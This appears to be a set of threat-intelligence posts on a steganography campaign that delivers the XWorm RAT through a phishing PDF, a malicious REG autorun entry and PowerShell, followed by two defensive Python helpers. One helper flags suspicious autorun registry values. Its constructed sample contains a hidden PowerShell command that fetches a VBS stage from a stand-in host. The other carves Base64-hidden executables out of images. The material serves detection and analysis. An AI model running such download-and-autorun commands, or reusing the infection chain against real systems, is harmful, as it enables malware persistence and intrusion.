🚨 New #Stegocampaign abuses obfuscated registry to execute payload
The attack is carried out through users following instructions, such as downloading a REG file that adds a #malicious script to Autorun. While exploiting Autorun has been rarely used recently, we found a sample actively using this method.

🔗 Execution chain:
PDF ➡️ Phish link ➡️ REG file adds a script to Autorun ➡️ OS reboot ➡️ CMD ➡️ PowerShell ➡️ #Wscript ➡️ Stegocampaign payload (DLL) extraction ➡️ Malware extraction and injection into AddInProcess32 ➡️ XWorm

⚠️ Victims receive a phishing PDF containing a link to download a .REG file. By opening it, users unknowingly modify the registry with a #script that fetches a VBS file from the web and adds it to Autorun.

Upon system reboot, the #VBS file launches #PowerShell, triggering an execution chain that ultimately infects the operating system with #malware.

👾 Then, #ReverseLoader downloads #XWorm, initiating its execution. The payload contains a DLL file embedded in an image, which then extracts XWorm from its resources and injects it into the AddInProcess32 system process.

❗️ This chain of actions abuses legitimate system tools and relies on user actions, making it difficult for automated security solutions to detect.
This puts organizations at risk by allowing attackers to evade detection, potentially leading to data breaches and access to sensitive data. #ANYRUN Sandbox offers full control over the VM, which allows you to interact with malware and manipulate its behavior.

👨‍💻 See analysis with a reboot:
https://app.any.run/tasks/068db7e4-6ff2-439a-bee8-06efa7abfabc/?utm_source=mastodon&utm_medium=post&utm_campaign=stegocampaign&utm_term=190225&utm_content=linktoservice

🚀 #ANYRUN's interactive VMs let users manually execute each step of the entire attack chain, even without a system reboot:
https://app.any.run/tasks/f9f07ae8-343f-4ea5-9499-a18f7c8534ef/?utm_source=mastodon&utm_medium=post&utm_campaign=stegocampaign&utm_term=190225&utm_content=linktoservice

🔍 Use this TI Lookup search query to find similar samples to enrich your company's detection systems:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=stegocampaign&utm_content=linktoti&utm_term=190225#%7B%22query%22:%22domainName:%5C%22filemail.com$%5C%22%22,%22dateRange%22:180%7D

Analyze and investigate the latest malware and phishing threats with #ANYRUN 🛡️

#cybersecurity #infosec
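Added example, not ANY.RUN's code and not the campaign's REG file: a small Python triage helper for the persistence step described above. It parses a Windows .REG export and flags string values written under the Run/RunOnce keys that launch a script host or shell, reference a script file, or carry a remote URL, which is the shape of the "REG file adds a script to Autorun" stage. The SAMPLE_REG text, the file paths in it and the example.invalid URL are constructed for the demo.

```python
import re

# Autorun locations a .REG file can populate: HKCU/HKLM ...\Run and ...\RunOnce.
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
# Script hosts and shells that an autorun value should rarely launch directly.
HOST_RE = re.compile(r"\b(wscript|cscript|powershell|pwsh|mshta|cmd)(\.exe)?\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r"\.(vbs|vbe|js|jse|ps1|hta|bat)\b", re.IGNORECASE)
# "name"=data  or  @=data (default value)
VALUE_LINE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')

# Constructed sample (not the real campaign file): one benign entry, two suspicious ones.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdateCheck"="wscript.exe //B \"C:\\Users\\Public\\update.vbs\""
"OneDrive"="\"C:\\Users\\Public\\OneDrive.exe\" /background"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Init"="powershell -w hidden -c \"iwr https://example.invalid/stage.vbs -o $env:TEMP\\u.vbs\""
'''


def _unescape(s):
    # .REG string syntax escapes backslash and double quote with a backslash.
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Parse a .REG export into {key_path: {value_name: string_value}}.

    Only REG_SZ values (quoted strings) are kept; hex:/dword: data is skipped
    because an autorun command line is always a string.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lstrip("-")  # a leading '-' marks a key deletion
            keys.setdefault(current, {})
            continue
        m = VALUE_LINE_RE.match(line)
        if current is None or not m:
            continue
        name = "@" if m.group(2) else _unescape(m.group(1))
        data = m.group(3).strip()
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            keys[current][name] = _unescape(data[1:-1])
    return keys


def flag_autorun_entries(text):
    """Return [(key, value_name, command, [reasons])] for suspicious Run/RunOnce values."""
    findings = []
    for key, values in parse_reg(text).items():
        if not RUN_KEY_RE.search(key):
            continue
        for name, cmd in values.items():
            reasons = []
            if HOST_RE.search(cmd):
                reasons.append("script host or shell launched from autorun")
            if SCRIPT_EXT_RE.search(cmd):
                reasons.append("script file referenced")
            if URL_RE.search(cmd):
                reasons.append("remote URL in autorun command")
            if reasons:
                findings.append((key, name, cmd, reasons))
    return findings


if __name__ == "__main__":
    for key, name, cmd, reasons in flag_autorun_entries(SAMPLE_REG):
        print(f"[{key}] {name!r} -> {cmd}\n    {', '.join(reasons)}")
```

The same parser can be pointed at a REG file pulled from a mail gateway or sandbox, or at an export of a live host's Run keys, to surface autorun entries that chain into wscript or PowerShell before a reboot triggers them.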

Analysis package_photo.pdf (MD5: 3D89F1BCC3873D106F138F35A9B1D3C6) Malicious activity - Interactive analysis ANY.RUN

Interactive malware hunting service. Live testing of most types of threats in any environment. No installation and no waiting necessary.

Recent #stegocampaign delivering #XWorm RAT #malware samples.
Quick review of #sandbox analysis reports reveals a simple, yet interesting infection chain. It contains a #VisualBasic script, #PowerShell scripts, a picture with a Base64-encoded executable and the #xwormrat itself. Those payloads have been downloaded from online hosting services such as #Pastebin and #Firebase.

My new article with #IOC and analysis https://malwarelab.eu/posts/stego-xworm/

#steganography #Steganoanalysis #anyrun #malwareanalysis #obfuscation #cyberchef
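Added example, not from the article or from ANY.RUN: a Python carver for the "picture with a Base64-encoded executable" stage, the extraction an analyst would otherwise do by hand in CyberChef. It scans an image file for long runs of Base64 alphabet characters and keeps only the runs that decode to a PE image (MZ header), so ordinary pixel data and short text chunks are ignored. FAKE_PE and SAMPLE_IMAGE are constructed stand-ins, not the campaign's files.

```python
import base64
import hashlib
import re

# A run of at least 64 Base64 alphabet characters; shorter runs occur naturally in binary data.
B64_RUN_RE = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")

# Constructed stand-in for a dropped PE: MZ header, DOS stub text, padding. Not a real executable.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"This program cannot be run in DOS mode." + b"\x00" * 200

# Constructed "image": PNG signature, fake pixel bytes, the Base64 blob, a trailing chunk name.
SAMPLE_IMAGE = (
    b"\x89PNG\r\n\x1a\n"
    + bytes(range(256)) * 2
    + base64.b64encode(FAKE_PE)
    + b"\n"
    + b"IEND\xaeB`\x82"
)


def carve_base64_pe(data):
    """Return [(offset, decoded_bytes)] for every Base64 run in data that decodes to a PE (MZ) image."""
    hits = []
    for m in B64_RUN_RE.finditer(data):
        chunk = m.group(0)
        if not chunk.endswith(b"=") and len(chunk) % 4:
            chunk = chunk[: -(len(chunk) % 4)]  # unpadded blob: drop the ragged tail
        try:
            blob = base64.b64decode(chunk, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if blob[:2] == b"MZ":
            hits.append((m.start(), blob))
    return hits


def summarize(hits):
    """Hash each carved blob so it can be shared as an indicator without shipping the file."""
    return [
        {"offset": off, "size": len(blob), "sha256": hashlib.sha256(blob).hexdigest()}
        for off, blob in hits
    ]


if __name__ == "__main__":
    for entry in summarize(carve_base64_pe(SAMPLE_IMAGE)):
        print(entry)
```

Run it against a real image by reading the file in binary mode and passing the bytes to carve_base64_pe; the MZ check is deliberately strict, so a run that decodes to something other than a PE is dropped rather than reported.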

XWorm RAT and Steganography :: MWLab — Ladislav's Malware Lab

When I looked at recent public submissions on Any.Run this week, my attention was attracted by XWorm samples with the tag “stegocampaign”. Quick review of analysis reports reveals a simple, yet interesting infection chain. It contains a Visual Basic script, a PowerShell script, a picture with a Base64-encoded executable and the XWorm RAT itself. Those payloads have been downloaded from online hosting services such as Pastebin or Firebase. Moreover, they have been downloaded via HTTPS, so basic network analysis does not reveal the content or the URLs; however, there are some simple methods to reveal the real URLs.
